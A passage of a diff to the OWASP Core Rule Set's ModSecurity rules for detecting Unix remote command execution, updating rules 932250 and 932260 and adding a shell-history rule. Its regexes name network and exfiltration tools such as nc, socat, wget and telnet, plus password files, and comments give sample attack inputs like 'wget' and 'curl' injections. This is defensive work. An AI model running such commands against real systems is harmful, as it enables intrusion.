%{MATCHED_VAR}',\ tag:'application-multi',\ @@ -405,11 +351,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix direct remote command execution ] @@ -417,36 +362,163 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # Detects Unix commands at the start of a parameter (direct RCE). # Example: foo=wget%20www.example.com # -# This case is different from command injection (rule 932100), where a +# In this rule we use a different check from command injection (rule 932230), where a # command string is appended (injected) to a regular parameter, and then # passed to a shell unescaped. # +# Additionaly, we require a trailing space (denoting command parameters) or command +# separator character after the command. +# # This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: # [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] # -# Due to a higher risk of false positives, the following changes have been -# made relative to rule 932100: -# 1) the set of commands is smaller -# 2) we require a trailing space (denoting command parameters) or command -# separator character after the command +# An effort was made to combat evasions by shell quoting (e.g. 'ls', +# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine +# transformation built-in to deal with this, but unfortunately, it +# replaces ';' characters and lowercases the payload, which is less +# useful for this case. However, emulating the transformation makes +# the regexp more complex. +# +# This is the base Rule to prevent Direct Unix Command Injection +# without prefix match. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932250.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932250 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)[\s\v&\)<>\|]" \ + "id:932250,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This rule complements rule 932250 for commands of 4 characters and up. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932260.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932260 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|xel[\s\v&\)<>\|])|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\v&\)<>\|]|proc)|ron)|d(?:iff[\s\v&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\v&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\v&\)<>\|]|l[\s\v&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\v&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[2-3]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\v&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\v&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:c(?:at|mp)|diff|[e-f]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ + "id:932260,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932260_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.932260_matched_var_name=%{matched_var_name}',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix shell history invocation ] +# +# Detects Unix shell history invocations in any context. # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# Example: +# GET /?rce=example.com +# GET /?rce=curl%20 +# GET /?rce=!-1!-2 # -# Then insert the assembled regexp into this template: +# Will execute `curl example.com`. We should be able to detect the '!-' sequence with a very low risk of false-positives since the sequence is very specific +# and does not allow for whitespaces in between. # -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932150.txt] -# [\\\\'\"]*(?:\s|;|\||&|<|>)" \ +# This rule has stricter siblings: +# * 932331 (PL3) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m)|w[\\\\'\"]*p(?:[\\\\'\"]*-[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d)?|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|y[\\\\'\"]*n[\\\\'\"]*x)|s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d)|h(?:[\\\\'\"]*\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b)?|o[\\\\'\"]*(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|f[\\\\'\"]*t[\\\\'\"]*p|u[\\\\'\"]*d[\\\\'\"]*o|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|k[\\\\'\"]*(?:e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*v|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|e[\\\\'\"]*r[\\\\'\"]*l(?:[\\\\'\"]*